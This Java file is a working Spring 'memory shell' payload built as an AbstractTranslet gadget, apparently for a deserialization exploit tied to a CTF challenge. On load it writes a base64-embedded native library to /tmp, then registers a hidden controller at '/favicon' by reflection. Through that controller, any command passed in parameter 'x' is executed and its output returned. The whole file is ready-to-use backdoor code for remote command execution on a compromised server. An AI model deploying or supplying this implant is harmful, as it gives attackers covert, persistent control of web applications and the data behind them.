import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.handler.AbstractHandlerMethodMapping;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.util.pattern.PathPatternParser;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileOutputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.Map;

@RestController
public class MSpringJNIController extends AbstractTranslet {
    public native String doExec(String cmd);
    public MSpringJNIController() throws Exception {
        // write so
        String str = "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AAAAAAAAAAA4ECAAAAAAAAcAAAAEAAAAAAAAAAAAAABAECAAAAAAAAcAAAAFAAAAAAAAAAAAAABIECAAAAAAAAcAAAAOAAAAAAAAAAAAAABQECAAAAAAAAcAAAAGAAAAAAAAAAAAAABYECAAAAAAAAcAAAAIAAAAAAAAAAAAAABgECAAAAAAAAcAAAAJAAAAAAAAAAAAAABIg+wISIsFPQggAEiFwHQC/9BIg8QIwwAAAAAAAAAAAP81QgggAP8lRAggAA8fQAD/JUIIIABoAAAAAOng/////yU6CCAAaAEAAADp0P////8lMgggAGgCAAAA6cD/////JSoIIABoAwAAAOmw/////yUiCCAAaAQAAADpoP////8lGgggAGgFAAAA6ZD/////JRIIIABoBgAAAOmA/////yUKCCAAaAcAAADpcP////8lAgggAGgIAAAA6WD/////JfoHIABoCQAAAOlQ/////yWCByAAZpAAAAAAAAAAAEiNPekHIABVSI0F4QcgAEg5+EiJ5XQZSIsFQgcgAEiFwHQNXf/gZi4PH4QAAAAAAF3DDx9AAGYuDx+EAAAAAABIjT2pByAASI01ogcgAFVIKf5IieVIwf4DSInwSMHoP0gBxkjR/nQYSIsFAQcgAEiFwHQMXf/gZg8fhAAAAAAAXcMPH0AAZi4PH4QAAAAAAIA9WQcgAAB1L0iDPdcGIAAAVUiJ5XQMSIs9OgcgAOg9////6Ej////GBTEHIAABXcMPH4AAAAAA88NmDx9EAABVSInlXelm////VUiJ5UiB7DAwAABIib3Yz///SIm10M///2RIiwQlKAAAAEiJRfgxwEiLhdjP//9IjTVFAgAASInH6Lj+//9IiYXoz///SIO96M///wB1B7gAAAAA62xIi4Xoz///SInH6IH+//+FwA+UwITAdEBIi5Xoz///SI2F8M///74AAQAASInH6D3+//9IhcAPlcCEwHTDSI2V8M///0iLhdDP//9IidZIicfoWv7//+uoSIuF6M///0iJx+jp/f//uAEAAABIi034ZEgzDCUoAAAAdAXosP3//8nDVUiJ5UiB7EAxAABIib3Yzv//SIm10M7//0iJlcjO//9kSIsEJSgAAABIiUX4McBIi43Izv//SIuF2M7//7oAAAAASInOSInH6LH9//9IiYXgzv//SMeF8M///wAAAABIx4X4z///AAAAAEiNhQDQ//+68C8AAL4AAAAASInH6Fv9//9IjZXwz///SIuF4M7//0iJ1kiJx+gi/f//SMeF8M7//wAAAABIx4X4zv//AAAAAEiNlQDP//+4AAAAALkeAAAASInX80irSI2V8M///0iNhfDO//9IidZIicfoTP3//0iNlfDO//9Ii4XYzv//SInWSInH6KP8//9IiYXozv//SIuF6M7//0iLTfhkSDMMJSgAAAB0BeiR/P//ycNVSInlSIl9+EiJdfC4BAABAF3DVUiJ5UiD7BBIiX34SIl18EiLRfhIiwBIi4A4BQAASItN8EiLVfhIic5Iidf/0MnDVUiJ5UiD7CBIiX34SIl18EiJVehIi0X4SIsASIuASAUAAEiLVehIi3XwSItN+EiJz//QycMAAABIg+wISIPECMNyAAABGwM7RAAAAAcAAADo+///YAAAAJj8//+IAAAAgv3//+AAAABa/v//AAEAAHn///8gAQAAjP///6AAAAC8////wAAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAID7//+wAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAAAI/P//CAAAAAAAAAAAAAAAHAAAAFwAAADk/v//MAAAAABBDhCGAkMNBmsMBwgAAAAcAAAAfAAAAPT+//81AAAAAEEOEIYCQw0GcAwHCAAAABwAAACcAAAAmvz//9gAAAAAQQ4QhgJDDQYC0wwHCAAAHAAAALwAAABS/f//HwEAAABBDhCGAkMNBgMaAQwHCAAcAAAA3AAAAFH+//8TAAAAAEEOEIYCQw0GTgwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAkAAAAAAAAQCQAAAAAAAAEAAAAAAAAAHQEAAAAAAAAMAAAAAAAAAKAHAAAAAAAADQAAAAAAAADMCwAAAAAAABkAAAAAAAAAEA4gAAAAAAAbAAAAAAAAAAgAAAAAAAAAGgAAAAAAAAAYDiAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAPABAAAAAAAABQAAAAAAAABQBAAAAAAAAAYAAAAAAAAAQAIAAAAAAAAKAAAAAAAAAFUBAAAAAAAACwAAAAAAAAAYAAAAAAAAAAMAAAAAAAAAABAgAAAAAAACAAAAAAAAAPAAAAAAAAAAFAAAAAAAAAAHAAAAAAAAABcAAAAAAAAAsAYAAAAAAAAHAAAAAAAAAAgGAAAAAAAACAAAAAAAAACoAAAAAAAAAAkAAAAAAAAAGAAAAAAAAAD+//9vAAAAANgFAAAAAAAA////bwAAAAABAAAAAAAAAPD//28AAAAApgUAAAAAAAD5//9vAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAOIAAAAAAAAAAAAAAAAAAAAAAAAAAAANYHAAAAAAAA5gcAAAAAAAD2BwAAAAAAAAYIAAAAAAAAFggAAAAAAAAmCAAAAAAAADYIAAAAAAAARggAAAAAAABWCAAAAAAAAGYIAAAAAAAAaBAgAAAAAABHQ0M6IChVYnVudHUgNy41LjAtM3VidW50dTF+MTguMDQpIDcuNS4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAMgBAAAAAAAAAAAAAAAAAAAAAAAAAwACAPABAAAAAAAAAAAAAAAAAAAAAAAAAwADAEACAAAAAAAAAAAAAAAAAAAAAAAAAwAEAFAEAAAAAAAAAAAAAAAAAAAAAAAAAwAFAKYFAAAAAAAAAAAAAAAAAAAAAAAAAwAGANgFAAAAAAAAAAAAAAAAAAAAAAAAAwAHAAgGAAAAAAAAAAAAAAAAAAAAAAAAAwAIALAGAAAAAAAAAAAAAAAAAAAAAAAAAwAJAKAHAAAAAAAAAAAAAAAAAAAAAAAAAwAKAMAHAAAAAAAAAAAAAAAAAAAAAAAAAwALAHAIAAAAAAAAAAAAAAAAAAAAAAAAAwAMAIAIAAAAAAAAAAAAAAAAAAAAAAAAAwANAMwLAAAAAAAAAAAAAAAAAAAAAAAAAwAOANULAAAAAAAAAAAAAAAAAAAAAAAAAwAPANgLAAAAAAAAAAAAAAAAAAAAAAAAAwAQACAMAAAAAAAAAAAAAAAAAAAAAAAAAwARABAOIAAAAAAAAAAAAAAAAAAAAAAAAwASABgOIAAAAAAAAAAAAAAAAAAAAAAAAwATACAOIAAAAAAAAAAAAAAAAAAAAAAAAwAUAOAPIAAAAAAAAAAAAAAAAAAAAAAAAwAVAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAWAGgQIAAAAAAAAAAAAAAAAAAAAAAAAwAXAHAQIAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMAAAAAgAMAIAIAAAAAAAAAAAAAAAAAAAOAAAAAgAMAMAIAAAAAAAAAAAAAAAAAAAhAAAAAgAMABAJAAAAAAAAAAAAAAAAAAA3AAAAAQAXAHAQIAAAAAAAAQAAAAAAAABGAAAAAQASABgOIAAAAAAAAAAAAAAAAABtAAAAAgAMAFAJAAAAAAAAAAAAAAAAAAB5AAAAAQARABAOIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAACvAAAAAQAQABgNAAAAAAAAAAAAAAAAAAAAAAAABADx/wAAAAAAAAAAAAAAAAAAAAC9AAAAAQAWAGgQIAAAAAAAAAAAAAAAAADKAAAAAQATACAOIAAAAAAAAAAAAAAAAADTAAAAAAAPANgLAAAAAAAAAAAAAAAAAADmAAAAAQAWAHAQIAAAAAAAAAAAAAAAAADyAAAAAQAVAAAQIAAAAAAAAAAAAAAAAAAIAQAAIgAMAGQLAAAAAAAAMAAAAAAAAAAmAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABCAQAAEAAWAHAQIAAAAAAAAAAAAAAAAABJAQAAEgANAMwLAAAAAAAAAAAAAAAAAABPAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABrAQAAEgAMAFoJAAAAAAAA2AAAAAAAAAB6AQAAEgAAAAAAAAAAAAAAAAAAAAAAAACOAQAAEgAAAAAAAAAAAAAAAAAAAAAAAACiAQAAEgAAAAAAAAAAAAAAAAAAAAAAAAC1AQAAEgAMAFELAAAAAAAAEwAAAAAAAADAAQAAIgAMAJQLAAAAAAAANQAAAAAAAADsAQAAEgAAAAAAAAAAAAAAAAAAAAAAAAD+AQAAIAAAAAAAAAAAAAAAAAAAAAAAAAANAgAAEgAMADIKAAAAAAAAHwEAAAAAAAAuAgAAEAAXAHgQIAAAAAAAAAAAAAAAAAAzAgAAEAAXAHAQIAAAAAAAAAAAAAAAAAA/AgAAEgAAAAAAAAAAAAAAAAAAAAAAAABSAgAAEgAAAAAAAAAAAAAAAAAAAAAAAABmAgAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAgAAIgAAAAAAAAAAAAAAAAAAAAAAAACcAgAAEgAJAKAHAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTgAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AE1TcHJpbmdKTklDb250cm9sbGVyLmMAX19GUkFNRV9FTkRfXwBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfWk43Sk5JRW52XzEyTmV3U3RyaW5nVVRGRVBLYwBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAF9maW5pAF9fc3RhY2tfY2hrX2ZhaWxAQEdMSUJDXzIuNABfWjZleGVjbWRQS2NQYwBwY2xvc2VAQEdMSUJDXzIuMi41AG1lbXNldEBAR0xJQkNfMi4yLjUAZmdldHNAQEdMSUJDXzIuMi41AEpOSV9PbkxvYWQAX1pON0pOSUVudl8xN0dldFN0cmluZ1VURkNoYXJzRVA4X2pzdHJpbmdQaABmZW9mQEBHTElCQ18yLjIuNQBfX2dtb25fc3RhcnRfXwBKYXZhX01T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";
        File f = new File("/tmp/libcmd.so");
        FileOutputStream fos = new FileOutputStream(f);
        fos.write(Base64.getDecoder().decode(str));
        fos.flush();
        fos.close();

        final String controllerPath = "/favicon";
        WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);
        Method method = MSpringJNIController.class.getDeclaredMethod("index");
        Field mapfield = AbstractHandlerMethodMapping.class.getDeclaredField("mappingRegistry");
        mapfield.setAccessible(true);
        Object mr = mapfield.get(r);
        Class<?> mrclazz = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry");
        Method mrms = mrclazz.getDeclaredMethod("register", Object.class, Object.class, Method.class);
        Field lookupfield = null;
        try {
            lookupfield = mrclazz.getDeclaredField("urlLookup");
            lookupfield.setAccessible(true);
        }catch (NoSuchFieldException e){
            lookupfield = mrclazz.getDeclaredField("pathLookup");
            lookupfield.setAccessible(true);
        }
        Map<String, Object> urlLookup = (Map<String, Object>) lookupfield.get(mr);
        for (String urlPath : urlLookup.keySet()) {
            if (controllerPath.equals(urlPath)) {
                throw new Exception("controller url path exist already");
            }
        }
        // 2.6.6写法
        RequestMappingInfo.BuilderConfiguration option = new RequestMappingInfo.BuilderConfiguration();
        option.setPatternParser(new PathPatternParser());
        RequestMappingInfo info = RequestMappingInfo.paths(controllerPath).options(option).build();
        mrms.setAccessible(true);
        // 免进入实例创建的死循环
        MSpringJNIController mem = new MSpringJNIController("aaa");
        mrms.invoke(mr, info, mem, method);
    }

    public MSpringJNIController(String aaa){}

    public void index() throws Exception{
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        try {
            String arg0 = request.getParameter("x");
            PrintWriter writer = response.getWriter();
            if (arg0 != null) {
                // liunx
                System.load("/tmp/libcmd.so");
                // windows
//                System.load("D:\\safetool\\Tools\\webleak\\POC\\Exploit\\java\\javatest\\2022MRCTF\\kryo反序列化\\code\\src\\main\\java\\libcmd.dll");
                MSpringJNIController jni = new MSpringJNIController("aaa");
                String content = jni.doExec(arg0);
                writer.println(content);
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}